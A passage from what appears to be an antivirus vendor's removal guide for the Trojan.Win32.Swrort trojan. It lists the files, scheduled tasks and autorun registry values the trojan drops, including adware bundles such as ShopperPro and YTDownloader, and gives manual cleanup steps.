%original file name%.exe:1304
%original file name%.exe:2080
%original file name%.exe:2228
%original file name%.exe:2300
7.exe:3088
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\bbgywhu.dll (3616 bytes)
%WinDir%\Tasks\aaca3934-a6c1-440e-8ac5-21234d851fa1-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\qguetosqu.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse17.tmp (527882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\203909 (39178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\ntwbv.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\yztwcnvph.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\idnfrnuqa.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\110365 (7838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\icvfyg.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp\vezhey.dll (6 bytes)
%Program Files%\Sense\aaca3934-a6c1-440e-8ac5-21234d851fa1-5.exe (7547 bytes)
%Program Files%\Sense\utils.exe (67132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\tglpj.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Sjikjrpjwjyg.tmp (331151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\Rpuxtvuh.exe (1310642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\gtkafj.dll (2059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso10.tmp\jbgkkfakd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\15270.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\30787 (36879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (557785 bytes)
%Program Files%\Ge-Force\f5963046-cdb9-419e-b034-e988d89c98b9-5.exe (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\jbgkkfakd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\sevlj.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vfeefowv.dll (3616 bytes)
%WinDir%\Tasks\f5963046-cdb9-419e-b034-e988d89c98b9-5.job (72 bytes)
%Program Files%\Ge-Force\utils.exe (56390 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\vmtixlgd.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\suobscxd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\335307 (6204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tglpj.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp\tvhjdcrog.dll (30464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (159542 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44363 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (47585 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2753 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11050 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
%Program Files%\YTDownloader\Updater.exe (17892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10788 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (16245 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20245 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Program Files%\YTDownloader\converter.exe (61456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseD.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseA.tmp (242805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp\setup1.exe (229796 bytes)
%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (86140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_shopperpro.exe (31085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_3245\%original file name%.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_geforce.exe (1505 bytes)
%WinDir%\Tasks\Inst_Rep.job (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_11820\ins_sense.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\bkulignxu.dll (2021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\yztwcnvph.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\qguetosqu.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Xfunhej.exe (1309931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp\Taldus.tmp (329705 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.Swrort.3_62c58b2105

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.Swrort.3_62c58b2105

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet